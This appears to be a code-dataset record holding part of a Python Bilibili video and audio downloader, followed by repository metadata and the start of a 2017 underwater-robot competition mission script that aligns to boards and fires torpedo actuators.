# refine title for a specific part, if it is a multi-part video
p = int(match1(self.url, r'[\?&]p=(\d+)') or match1(self.url, r'/index_(\d+)') or
'1') # use URL to decide p-number, not initial_state['p']
if pn > 1:
part = initial_state['videoData']['pages'][p - 1]['part']
self.title = '%s (P%s. %s)' % (self.title, p, part)
# construct playinfos
avid = initial_state['aid']
cid = initial_state['videoData']['pages'][p - 1]['cid'] # use p-number, not initial_state['videoData']['cid']
current_quality, best_quality = None, None
if playinfo is not None:
current_quality = playinfo['data']['quality'] or None # 0 indicates an error, fallback to None
if 'accept_quality' in playinfo['data'] and playinfo['data']['accept_quality'] != []:
best_quality = playinfo['data']['accept_quality'][0]
playinfos = []
if playinfo is not None:
playinfos.append(playinfo)
if playinfo_ is not None:
playinfos.append(playinfo_)
# get alternative formats from API
for qn in [120, 112, 80, 64, 32, 16]:
# automatic format for durl: qn=0
# for dash, qn does not matter
if current_quality is None or qn < current_quality:
api_url = self.bilibili_api(avid, cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
else:
message = api_playinfo['data']['message']
if best_quality is None or qn <= best_quality:
api_url = self.bilibili_interface_api(cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo_data = json.loads(api_content)
if api_playinfo_data.get('quality'):
playinfos.append({'code': 0, 'message': '0', 'ttl': 1, 'data': api_playinfo_data})
if not playinfos:
log.w(message)
# use bilibili error video instead
url = 'https://static.hdslb.com/error.mp4'
_, container, size = url_info(url)
self.streams['flv480'] = {'container': container, 'size': size, 'src': [url]}
return
for playinfo in playinfos:
quality = playinfo['data']['quality']
format_id = self.stream_qualities[quality]['id']
container = self.stream_qualities[quality]['container'].lower()
desc = self.stream_qualities[quality]['desc']
if 'durl' in playinfo['data']:
src, size = [], 0
for durl in playinfo['data']['durl']:
src.append(durl['url'])
size += durl['size']
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': src}
# DASH formats
if 'dash' in playinfo['data']:
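# cache the size of each audio quality so a matching audio track is only sized once across video streams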
audio_size_cache = {}
for video in playinfo['data']['dash']['video']:
# prefer the latter codecs!
s = self.stream_qualities[video['id']]
format_id = 'dash-' + s['id'] # prefix
container = 'mp4' # enforce MP4 container
desc = s['desc']
audio_quality = s['audio_quality']
baseurl = video['baseUrl']
size = self.url_size(baseurl, headers=self.bilibili_headers(referer=self.url))
# find matching audio track
if playinfo['data']['dash']['audio']:
audio_baseurl = playinfo['data']['dash']['audio'][0]['baseUrl']
for audio in playinfo['data']['dash']['audio']:
if int(audio['id']) == audio_quality:
audio_baseurl = audio['baseUrl']
break
if not audio_size_cache.get(audio_quality, False):
audio_size_cache[audio_quality] = self.url_size(audio_baseurl, headers=self.bilibili_headers(referer=self.url))
size += audio_size_cache[audio_quality]
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl], [audio_baseurl]], 'size': size}
else:
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl]], 'size': size}
# get danmaku
self.danmaku = get_content('http://comment.bilibili.com/%s.xml' % cid)
# bangumi
elif sort == 'bangumi':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
# warn if this bangumi has more than 1 video
epn = len(initial_state['epList'])
if epn > 1 and not kwargs.get('playlist'):
log.w('This bangumi currently has %s videos. (use --playlist to download all videos.)' % epn)
# set video title
self.title = initial_state['h1Title']
# construct playinfos
ep_id = initial_state['epInfo']['id']
avid = initial_state['epInfo']['aid']
cid = initial_state['epInfo']['cid']
playinfos = []
api_url = self.bilibili_bangumi_api(avid, cid, ep_id)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
else:
log.e(api_playinfo['message'])
return
current_quality = api_playinfo['result']['quality']
# get alternative formats from API
for fnval in [8, 16]:
for qn in [120, 112, 80, 64, 32, 16]:
# automatic format for durl: qn=0
# for dash, qn does not matter
if qn != current_quality:
api_url = self.bilibili_bangumi_api(avid, cid, ep_id, qn=qn, fnval=fnval)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
for playinfo in playinfos:
if 'durl' in playinfo['result']:
quality = playinfo['result']['quality']
format_id = self.stream_qualities[quality]['id']
container = self.stream_qualities[quality]['container'].lower()
desc = self.stream_qualities[quality]['desc']
src, size = [], 0
for durl in playinfo['result']['durl']:
src.append(durl['url'])
size += durl['size']
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': src}
# DASH formats
if 'dash' in playinfo['result']:
for video in playinfo['result']['dash']['video']:
# playinfo['result']['quality'] does not reflect the correct quality of DASH stream
quality = self.height_to_quality(video['height'], video['id']) # convert height to quality code
s = self.stream_qualities[quality]
format_id = 'dash-' + s['id'] # prefix
container = 'mp4' # enforce MP4 container
desc = s['desc']
audio_quality = s['audio_quality']
baseurl = video['baseUrl']
size = url_size(baseurl, headers=self.bilibili_headers(referer=self.url))
# find matching audio track
audio_baseurl = playinfo['result']['dash']['audio'][0]['baseUrl']
for audio in playinfo['result']['dash']['audio']:
if int(audio['id']) == audio_quality:
audio_baseurl = audio['baseUrl']
break
size += url_size(audio_baseurl, headers=self.bilibili_headers(referer=self.url))
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl], [audio_baseurl]], 'size': size}
# get danmaku
self.danmaku = get_content('http://comment.bilibili.com/%s.xml' % cid)
# vc video
elif sort == 'vc':
video_id = match1(self.url, r'https?://vc\.?bilibili\.com/video/(\d+)')
api_url = self.bilibili_vc_api(video_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
api_playinfo = json.loads(api_content)
# set video title
self.title = '%s (%s)' % (api_playinfo['data']['user']['name'], api_playinfo['data']['item']['id'])
height = api_playinfo['data']['item']['height']
quality = self.height_to_quality(height) # convert height to quality code
s = self.stream_qualities[quality]
format_id = s['id']
container = 'mp4' # enforce MP4 container
desc = s['desc']
playurl = api_playinfo['data']['item']['video_playurl']
size = int(api_playinfo['data']['item']['video_size'])
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': [playurl]}
# live
elif sort == 'live':
m = re.match(r'https?://live\.bilibili\.com/(\w+)', self.url)
short_id = m.group(1)
api_url = self.bilibili_live_room_init_api(short_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
room_init_info = json.loads(api_content)
room_id = room_init_info['data']['room_id']
api_url = self.bilibili_live_room_info_api(room_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
room_info = json.loads(api_content)
# set video title
self.title = room_info['data']['title'] + '.' + str(int(time.time()))
api_url = self.bilibili_live_api(room_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
video_info = json.loads(api_content)
durls = video_info['data']['durl']
playurl = durls[0]['url']
container = 'flv' # enforce FLV container
self.streams['flv'] = {'container': container, 'quality': 'unknown',
'size': 0, 'src': [playurl]}
# audio
elif sort == 'audio':
m = re.match(r'https?://(?:www\.)?bilibili\.com/audio/au(\d+)', self.url)
sid = m.group(1)
api_url = self.bilibili_audio_info_api(sid)
api_content = get_content(api_url, headers=self.bilibili_headers())
song_info = json.loads(api_content)
# set audio title
self.title = song_info['data']['title']
# get lyrics
self.lyrics = get_content(song_info['data']['lyric'])
api_url = self.bilibili_audio_api(sid)
api_content = get_content(api_url, headers=self.bilibili_headers())
audio_info = json.loads(api_content)
playurl = audio_info['data']['cdns'][0]
size = audio_info['data']['size']
container = 'mp4' # enforce MP4 container
self.streams['mp4'] = {'container': container,
'size': size, 'src': [playurl]}
# h images
elif sort == 'h':
m = re.match(r'https?://h\.?bilibili\.com/(\d+)', self.url)
doc_id = m.group(1)
api_url = self.bilibili_h_api(doc_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
h_info = json.loads(api_content)
urls = []
for pic in h_info['data']['item']['pictures']:
img_src = pic['img_src']
urls.append(img_src)
size = urls_size(urls)
self.title = doc_id
container = 'jpg' # enforce JPG container
self.streams[container] = {'container': container,
'size': size, 'src': urls}
def prepare_by_cid(self, avid, cid, title, html_content, playinfo, playinfo_, url):
# response for interactive video
# mainly for interactive videos: parts are distinguished by cid rather than by url
self.stream_qualities = {s['quality']: s for s in self.stream_types}
self.title = title
self.url = url
current_quality, best_quality = None, None
if playinfo is not None:
current_quality = playinfo['data']['quality'] or None # 0 indicates an error, fallback to None
if 'accept_quality' in playinfo['data'] and playinfo['data']['accept_quality'] != []:
best_quality = playinfo['data']['accept_quality'][0]
playinfos = []
if playinfo is not None:
playinfos.append(playinfo)
if playinfo_ is not None:
playinfos.append(playinfo_)
# get alternative formats from API
for qn in [80, 64, 32, 16]:
# automatic format for durl: qn=0
# for dash, qn does not matter
if current_quality is None or qn < current_quality:
api_url = self.bilibili_api(avid, cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers())
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
else:
message = api_playinfo['data']['message']
if best_quality is None or qn <= best_quality:
api_url = self.bilibili_interface_api(cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers())
api_playinfo_data = json.loads(api_content)
if api_playinfo_data.get('quality'):
playinfos.append({'code': 0, 'message': '0', 'ttl': 1, 'data': api_playinfo_data})
if not playinfos:
log.w(message)
# use bilibili error video instead
url = 'https://static.hdslb.com/error.mp4'
_, container, size = url_info(url)
self.streams['flv480'] = {'container': container, 'size': size, 'src': [url]}
return
for playinfo in playinfos:
quality = playinfo['data']['quality']
format_id = self.stream_qualities[quality]['id']
container = self.stream_qualities[quality]['container'].lower()
desc = self.stream_qualities[quality]['desc']
if 'durl' in playinfo['data']:
src, size = [], 0
for durl in playinfo['data']['durl']:
src.append(durl['url'])
size += durl['size']
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': src}
# DASH formats
if 'dash' in playinfo['data']:
audio_size_cache = {}
for video in playinfo['data']['dash']['video']:
# prefer the latter codecs!
s = self.stream_qualities[video['id']]
format_id = 'dash-' + s['id'] # prefix
container = 'mp4' # enforce MP4 container
desc = s['desc']
audio_quality = s['audio_quality']
baseurl = video['baseUrl']
size = self.url_size(baseurl, headers=self.bilibili_headers(referer=self.url))
# find matching audio track
if playinfo['data']['dash']['audio']:
audio_baseurl = playinfo['data']['dash']['audio'][0]['baseUrl']
for audio in playinfo['data']['dash']['audio']:
if int(audio['id']) == audio_quality:
audio_baseurl = audio['baseUrl']
break
if not audio_size_cache.get(audio_quality, False):
audio_size_cache[audio_quality] = self.url_size(audio_baseurl,
headers=self.bilibili_headers(referer=self.url))
size += audio_size_cache[audio_quality]
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl], [audio_baseurl]], 'size': size}
else:
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl]], 'size': size}
# get danmaku
self.danmaku = get_content('http://comment.bilibili.com/%s.xml' % cid)
def extract(self, **kwargs):
# set UA and referer for downloading
headers = self.bilibili_headers(referer=self.url)
self.ua, self.referer = headers['User-Agent'], headers['Referer']
if not self.streams_sorted:
# no stream is available
return
if 'stream_id' in kwargs and kwargs['stream_id']:
# extract the stream
stream_id = kwargs['stream_id']
if stream_id not in self.streams and stream_id not in self.dash_streams:
log.e('[Error] Invalid video format.')
log.e('Run \'-i\' command with no specific video format to view all available formats.')
exit(2)
else:
# extract stream with the best quality
stream_id = self.streams_sorted[0]['id']
def download_playlist_by_url(self, url, **kwargs):
self.url = url
kwargs['playlist'] = True
html_content = get_content(self.url, headers=self.bilibili_headers(referer=self.url))
# sort it out
if re.match(r'https?://(www\.)?bilibili\.com/bangumi/play/ep(\d+)', self.url):
sort = 'bangumi'
elif match1(html_content, r'<meta property="og:url" content="(https://www.bilibili.com/bangumi/play/[^"]+)"'):
sort = 'bangumi'
elif re.match(r'https?://(www\.)?bilibili\.com/bangumi/media/md(\d+)', self.url) or \
re.match(r'https?://bangumi\.bilibili\.com/anime/(\d+)', self.url):
sort = 'bangumi_md'
elif re.match(r'https?://(www\.)?bilibili\.com/video/(av(\d+)|BV(\S+))', self.url):
sort = 'video'
elif re.match(r'https?://space\.?bilibili\.com/(\d+)/channel/detail\?.*cid=(\d+)', self.url):
sort = 'space_channel'
elif re.match(r'https?://space\.?bilibili\.com/(\d+)/favlist\?.*fid=(\d+)', self.url):
sort = 'space_favlist'
elif re.match(r'https?://space\.?bilibili\.com/(\d+)/video', self.url):
sort = 'space_video'
elif re.match(r'https?://(www\.)?bilibili\.com/audio/am(\d+)', self.url):
sort = 'audio_menu'
else:
log.e('[Error] Unsupported URL pattern.')
exit(1)
# regular av video
if sort == 'video':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
aid = initial_state['videoData']['aid']
pn = initial_state['videoData']['videos']
if pn != len(initial_state['videoData']['pages']):  # interactive video
search_node_list = []
download_cid_set = set([initial_state['videoData']['cid']])
params = {
'id': 'cid:{}'.format(initial_state['videoData']['cid']),
'aid': str(aid)
}
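# player.so embeds an <interaction> element containing JSON; its graph_version is required by the stein/nodeinfo API used below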
urlcontent = get_content('https://api.bilibili.com/x/player.so?' + parse.urlencode(params), headers=self.bilibili_headers(referer='https://www.bilibili.com/video/av{}'.format(aid)))
graph_version = json.loads(urlcontent[urlcontent.find('<interaction>') + 13:urlcontent.find('</interaction>')])['graph_version']
params = {
'aid': str(aid),
'graph_version': graph_version,
'platform': 'pc',
'portal': 0,
'screen': 0,
}
node_info = json.loads(get_content('https://api.bilibili.com/x/stein/nodeinfo?' + parse.urlencode(params)))
playinfo_text = match1(html_content, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo = json.loads(playinfo_text) if playinfo_text else None
html_content_ = get_content(self.url, headers=self.bilibili_headers(cookie='CURRENT_FNVAL=16'))
playinfo_text_ = match1(html_content_, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo_ = json.loads(playinfo_text_) if playinfo_text_ else None
self.prepare_by_cid(aid, initial_state['videoData']['cid'], initial_state['videoData']['title'] + 'P{}. {}'.format(1, node_info['data']['title']), html_content, playinfo, playinfo_, url)
self.extract(**kwargs)
self.download(**kwargs)
for choice in node_info['data']['edges']['choices']:
search_node_list.append(choice['node_id'])
if choice['cid'] not in download_cid_set:
download_cid_set.add(choice['cid'])
self.prepare_by_cid(aid, choice['cid'], initial_state['videoData']['title'] + 'P{}. {}'.format(len(download_cid_set), choice['option']), html_content, playinfo, playinfo_, url)
self.extract(**kwargs)
self.download(**kwargs)
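# breadth-first traversal of the remaining choice nodes; every cid not seen before is prepared and downloaded once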
while len(search_node_list) > 0:
node_id = search_node_list.pop(0)
params.update({'node_id': node_id})
node_info = json.loads(get_content('https://api.bilibili.com/x/stein/nodeinfo?' + parse.urlencode(params)))
if 'edges' in node_info['data']:
for choice in node_info['data']['edges']['choices']:
search_node_list.append(choice['node_id'])
if choice['cid'] not in download_cid_set:
download_cid_set.add(choice['cid'])
self.prepare_by_cid(aid, choice['cid'], initial_state['videoData']['title'] + 'P{}. {}'.format(len(download_cid_set), choice['option']), html_content, playinfo, playinfo_, url)
try:
self.streams_sorted = [dict([('id', stream_type['id'])] + list(self.streams[stream_type['id']].items())) for stream_type in self.__class__.stream_types if stream_type['id'] in self.streams]
except:
self.streams_sorted = [dict([('itag', stream_type['itag'])] + list(self.streams[stream_type['itag']].items())) for stream_type in self.__class__.stream_types if stream_type['itag'] in self.streams]
self.extract(**kwargs)
self.download(**kwargs)
else:
playinfo_text = match1(html_content, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo = json.loads(playinfo_text) if playinfo_text else None
html_content_ = get_content(self.url, headers=self.bilibili_headers(cookie='CURRENT_FNVAL=16'))
playinfo_text_ = match1(html_content_, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo_ = json.loads(playinfo_text_) if playinfo_text_ else None
p = int(match1(self.url, r'[\?&]p=(\d+)') or match1(self.url, r'/index_(\d+)') or '1') - 1
for pi in range(p, pn):
self.prepare_by_cid(aid, initial_state['videoData']['pages'][pi]['cid'], '%s (P%s. %s)' % (initial_state['videoData']['title'], pi + 1, initial_state['videoData']['pages'][pi]['part']), html_content, playinfo, playinfo_, url)
try:
self.streams_sorted = [dict([('id', stream_type['id'])] + list(self.streams[stream_type['id']].items())) for stream_type in self.__class__.stream_types if stream_type['id'] in self.streams]
except:
self.streams_sorted = [dict([('itag', stream_type['itag'])] + list(self.streams[stream_type['itag']].items())) for stream_type in self.__class__.stream_types if stream_type['itag'] in self.streams]
self.extract(**kwargs)
self.download(**kwargs)
# purl = 'https://www.bilibili.com/video/av%s?p=%s' % (aid, pi+1)
# self.__class__().download_by_url(purl, **kwargs)
elif sort == 'bangumi':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
epn, i = len(initial_state['epList']), 0
for ep in initial_state['epList']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
ep_id = ep['id']
epurl = 'https://www.bilibili.com/bangumi/play/ep%s/' % ep_id
self.__class__().download_by_url(epurl, **kwargs)
elif sort == 'bangumi_md':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
epn, i = len(initial_state['mediaInfo']['episodes']), 0
for ep in initial_state['mediaInfo']['episodes']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
ep_id = ep['ep_id']
epurl = 'https://www.bilibili.com/bangumi/play/ep%s/' % ep_id
self.__class__().download_by_url(epurl, **kwargs)
elif sort == 'space_channel':
m = re.match(r'https?://space\.?bilibili\.com/(\d+)/channel/detail\?.*cid=(\d+)', self.url)
mid, cid = m.group(1), m.group(2)
api_url = self.bilibili_space_channel_api(mid, cid)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
channel_info = json.loads(api_content)
# TBD: channel of more than 100 videos
epn, i = len(channel_info['data']['list']['archives']), 0
for video in channel_info['data']['list']['archives']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
url = 'https://www.bilibili.com/video/av%s' % video['aid']
self.__class__().download_playlist_by_url(url, **kwargs)
elif sort == 'space_favlist':
m = re.match(r'https?://space\.?bilibili\.com/(\d+)/favlist\?.*fid=(\d+)', self.url)
vmid, fid = m.group(1), m.group(2)
api_url = self.bilibili_space_favlist_api(fid)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
favlist_info = json.loads(api_content)
pc = favlist_info['data']['info']['media_count'] // len(favlist_info['data']['medias'])
if favlist_info['data']['info']['media_count'] % len(favlist_info['data']['medias']) != 0:
pc += 1
for pn in range(1, pc + 1):
log.w('Extracting %s of %s pages ...' % (pn, pc))
api_url = self.bilibili_space_favlist_api(fid, pn=pn)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
favlist_info = json.loads(api_content)
epn, i = len(favlist_info['data']['medias']), 0
for video in favlist_info['data']['medias']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
url = 'https://www.bilibili.com/video/av%s' % video['id']
self.__class__().download_playlist_by_url(url, **kwargs)
elif sort == 'space_video':
m = re.match(r'https?://space\.?bilibili\.com/(\d+)/video', self.url)
mid = m.group(1)
api_url = self.bilibili_space_video_api(mid)
api_content = get_content(api_url, headers=self.bilibili_headers())
videos_info = json.loads(api_content)
pc = videos_info['data']['pages']
for pn in range(1, pc + 1):
api_url = self.bilibili_space_video_api(mid, pn=pn)
api_content = get_content(api_url, headers=self.bilibili_headers())
videos_info = json.loads(api_content)
epn, i = len(videos_info['data']['vlist']), 0
for video in videos_info['data']['vlist']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
url = 'https://www.bilibili.com/video/av%s' % video['aid']
self.__class__().download_playlist_by_url(url, **kwargs)
elif sort == 'audio_menu':
m = re.match(r'https?://(?:www\.)?bilibili\.com/audio/am(\d+)', self.url)
sid = m.group(1)
#api_url = self.bilibili_audio_menu_info_api(sid)
#api_content = get_content(api_url, headers=self.bilibili_headers())
#menu_info = json.loads(api_content)
api_url = self.bilibili_audio_menu_song_api(sid)
api_content = get_content(api_url, headers=self.bilibili_headers())
menusong_info = json.loads(api_content)
epn, i = len(menusong_info['data']['data']), 0
for song in menusong_info['data']['data']:
i += 1; log.w('Extracting %s of %s songs ...' % (i, epn))
url = 'https://www.bilibili.com/audio/au%s' % song['id']
self.__class__().download_by_url(url, **kwargs)
site = Bilibili()
download = site.download_by_url
download_playlist = site.download_playlist_by_url
bilibili_download = download
| 52.599222
| 237
| 0.54658
|
c4eb360e23f4bb43e91824560fef84d985d7cea2
| 12,473
|
py
|
Python
|
mission/missions/old/2017/torpedoes.py
|
cuauv/software
|
5ad4d52d603f81a7f254f365d9b0fe636d03a260
|
[
"BSD-3-Clause"
] | 70
|
2015-11-16T18:04:01.000Z
|
2022-03-05T09:04:02.000Z
|
mission/missions/old/2017/torpedoes.py
|
cuauv/software
|
5ad4d52d603f81a7f254f365d9b0fe636d03a260
|
[
"BSD-3-Clause"
] | 1
|
2016-08-03T05:13:19.000Z
|
2016-08-03T06:19:39.000Z
|
mission/missions/old/2017/torpedoes.py
|
cuauv/software
|
5ad4d52d603f81a7f254f365d9b0fe636d03a260
|
[
"BSD-3-Clause"
] | 34
|
2015-12-15T17:29:23.000Z
|
2021-11-18T14:15:12.000Z
|
from collections import namedtuple
import copy
import shm
from shm.watchers import watcher
from mission.framework.task import Task
from mission.framework.targeting import PIDLoop, ForwardTarget
from mission.framework.combinators import (
Sequential,
Concurrent,
MasterConcurrent,
Retry,
Conditional,
Defer,
)
from mission.framework.timing import Timeout
from mission.framework.movement import (
RelativeToInitialDepth,
RelativeToCurrentDepth,
VelocityX,
VelocityY,
Depth,
)
from mission.framework.primitive import (
Zero,
Log,
Succeed,
Fail,
FunctionTask,
NoOp,
)
from mission.framework.actuators import FireActuator
from mission.framework.position import (
GoToPositionRough,
MoveX,
MoveY,
MoveXRough,
WithPositionalControl,
NavigationSpeed,
)
from mission.framework.track import ConsistentObject
from mission.framework.helpers import call_if_function
from mission.missions.ozer_common import (
ConsistentTask,
Except,
GlobalTimeoutError,
StillHeadingSearch,
GradualHeading,
PrintDone,
Infinite,
)
from mission.constants.config import torpedoes as constants
"""
Torpedoes 2017!
"""
class Vision(Task):
# Board/cutout IDs are indices
TENT_ID = 0
SQUID_ID = 1
def __init__(self, *args, **kwargs):
super().__init__()
# Vision object needs to be ready for rest of mission to access, so must
# initialize before on_first_run()
self.trackers = [ConsistentObject() for i in range(2)]
self.watcher = watcher()
self.watcher.watch(shm.torpedoes_vision)
self.pull()
def pull(self):
shm_boards = [shm.torpedoes_tentacle.get(), shm.torpedoes_squid.get()]
def noneify(g): return g if g.visible else None
self.boards = [t.map(noneify(b)) for t, b in zip(self.trackers, shm_boards)]
def on_run(self, *args, **kwargs):
if self.watcher.has_changed():
self.pull()
# Forecam offsets may be incorrect to compensate for inaccurate DVL-less control
class Torp:
FIRE_TIME = 0.5
def __init__(self, forecam_offset, actuator):
self.forecam_offset = forecam_offset
self.actuator = actuator
def AlignFromForecam(self):
return ConsistentTask(Concurrent(
RelativeToInitialDepth(-self.forecam_offset[1]),
MoveY(-self.forecam_offset[0], deadband=0.025),
finite=False,
), success=2, total=3)
def Fire(self):
return Sequential(
Log('Firing {} (!!)'.format(self.actuator)),
FireActuator(self.actuator, self.FIRE_TIME),
)
TORPS = [Torp((-0.02, -0.12), 'left_torpedo'), Torp((0.15, -0.12), 'right_torpedo')]
Cutout = namedtuple('Cutout', ['name', 'board_func', 'coord_func', 'is_noodle'])
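# name: label used in log messages; board_func/coord_func: lazily fetch the tracked board and the cutout (x, y); is_noodle: cutout covered by seaweed, requiring the poker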
class Torpedoes(Task):
def on_first_run(self, vision, *args, **kwargs):
def small_cutout_coord(board):
return (board.small_cutout_x, board.small_cutout_y)
def large_cutout_coord(board):
return (board.large_cutout_x, board.large_cutout_y)
small_tent_cutout = Cutout(
'small tentacle',
lambda: vision.boards[vision.TENT_ID],
lambda: small_cutout_coord(vision.boards[vision.TENT_ID]),
False,
)
# large_tent_cutout = Cutout(
# 'large tentacle',
# lambda: vision.boards[vision.TENT_ID],
# lambda: large_cutout_coord(vision.boards[vision.TENT_ID]),
# False,
# )
small_squid_cutout = Cutout(
'small squid',
lambda: vision.boards[vision.SQUID_ID],
lambda: small_cutout_coord(vision.boards[vision.SQUID_ID]),
True,
)
# large_squid_cutout = Cutout(
# 'large squid',
# lambda: vision.boards[vision.SQUID_ID],
# lambda: large_cutout_coord(vision.boards[vision.SQUID_ID]),
# False,
# )
self.use_task(Except(
Sequential(
Log('Starting torpedoes!'),
Succeed(TryCompleteCutout(vision, small_tent_cutout, TORPS[0])),
Succeed(TryCompleteCutout(vision, small_squid_cutout, TORPS[1])),
),
Fail(Log('Global timeout, aborting torpedoes')),
GlobalTimeoutError,
))
class TryCompleteCutout(Task):
def on_first_run(self, vision, cutout, torp, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Log('Starting to attempt {} cutout'.format(cutout.name)),
Retry(lambda: CompleteCutout(vision, cutout, torp), 3),
),
on_fail=Fail(Sequential(
Log('Failed to ever complete {} cutout, firing torpedo anyway'.format(cutout.name)),
torp.Fire(),
)),
))
class CompleteCutout(Task):
MOVE_BOARD_TIMEOUT = 30
ALIGN_CUTOUT_TIMEOUT = 60
def on_first_run(self, vision, cutout, torp, *args, **kwargs):
self.use_task(Sequential(
Log('Attempting {} cutout'.format(cutout.name)),
Conditional(
Retry(lambda: Timeout(
MoveInFrontOfBoards(vision),
self.MOVE_BOARD_TIMEOUT,
), 3),
on_fail=Fail(Log('Failed to ever move in front of boards')),
),
RestorePos(WithPositionalControl(Sequential(
Timeout(AlignCutout(cutout, torp), self.ALIGN_CUTOUT_TIMEOUT),
torp.Fire(),
))),
))
class MoveInFrontOfBoards(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Sequential(
Log('Moving to torpedoes depth'),
Depth(constants.depth),
Log('Searching for boards'),
MasterConcurrent(IdentifyBoard(vision), StillHeadingSearch()),
AlignBoards(lambda: vision.boards, min_boards=2),
))
class IdentifyBoard(Task):
def on_run(self, vision, *args, **kwargs):
if sum(b is not None for b in vision.boards) > 0:
self.finish()
class AlignBoards(Task):
"""
Imprecisely align to both torpedoes boards.
Pre: at least one board in sight
Post: both boards centered in front of sub
"""
TARGET_WIDTH = 0.8
FOV = 30
def board_count(self, boards_func):
return sum(b is not None for b in boards_func())
def on_first_run(self, boards_func, min_boards=0, *args, **kwargs):
def avg_board(boards):
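# with both boards visible, average their geometry fields; otherwise fall back to the single visible board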
if len(boards) == 1:
return boards[0]
for i, b in enumerate(boards):
if b is not None:
avg_i = i
avg_b = copy.copy(b)
break
other_b = boards[1]
if avg_i == 0 and other_b is not None:
for attr in ['x', 'y', 'skew', 'width', 'height']:
setattr(
avg_b,
attr,
(getattr(avg_b, attr) + getattr(other_b, attr)) / 2,
)
return avg_b
def assert_boards():
return self.board_count(boards_func) >= min_boards
self.task = Retry(lambda: Sequential(
Log('Aligning boards'),
Concurrent(
AlignSurge(lambda: avg_board(boards_func()), self.TARGET_WIDTH),
AlignSkew(lambda: avg_board(boards_func())),
# Align heading
GradualHeading(lambda: shm.kalman.heading.get() + avg_board(boards_func()).x * self.FOV),
finite=False,
),
Zero(),
Conditional(
FunctionTask(assert_boards),
on_fail=Fail(Sequential(
Log('Less than {} boards aligned, backing up and retrying'.format(min_boards)),
MoveXRough(-0.25),
)),
),
), 2)
def on_run(self, boards_func, *args, **kwargs):
if self.board_count(boards_func) == 0:
self.loge('No boards visible, aborting align')
self.finish(success=False)
else:
self.task()
if self.task.finished:
self.finish(success=self.task.success)
class AlignSurge(Task):
DEADBAND = 0.03
P = 0.5
D = 0.2
MAX_OUT = 0.3
def on_first_run(self, board_func, width, *args, **kwargs):
""" PID our distance instead of the raw width since it's linear """
self.use_task(PIDLoop(
input_value=lambda: 1 / board_func().width,
output_function=VelocityX(),
target=lambda: 1 / call_if_function(width),
deadband=self.DEADBAND,
p=self.P,
d=self.D,
negate=True,
max_out=self.MAX_OUT,
))
class AlignSkew(Task):
def on_first_run(self, board_func, *args, **kwargs):
self.use_task(PIDLoop(
input_value=lambda: board_func().skew,
output_function=VelocityY(),
target=0,
deadband=0.1,
p=1.5,
d=0.5,
max_out=0.2,
))
class RestorePos(Task):
"""
Restore the position of the sub from before the given task started.
"""
def on_first_run(self, task, *args, **kwargs):
k = shm.kalman.get()
self.use_task(Defer(task, Sequential(
Log('Restoring position'),
NavigationSpeed(GoToPositionRough(
north=k.north,
east=k.east,
heading=k.heading,
depth=k.depth,
), 0.3),
Zero(),
)))
class AlignCutout(Task):
NORMAL_TARGET_BOARD_WIDTH = 2
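# width whose reciprocal (proportional to distance) is halfway between the AlignBoards target and the final close-up target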
NORMAL_TARGET_BOARD_HALF_WIDTH = 1 / ((
1 / NORMAL_TARGET_BOARD_WIDTH + 1 / AlignBoards.TARGET_WIDTH
) / 2)
SEAWEED_TARGET_BOARD_WIDTH = 1
ALIGN_POKER_DISTANCE = 0.63
def on_first_run(self, cutout, torp, *args, **kwargs):
def unsee_cutout():
self.must_see_cutout = False
self.must_see_cutout = True
def TargetCutout(deadband):
return ForwardTarget(
lambda: cutout.coord_func(),
(0, 0),
deadband=(deadband, deadband),
px=0.7,
py=0.5,
max_out=0.3,
)
def MoveClose(width, deadband):
return ConsistentTask(Concurrent(
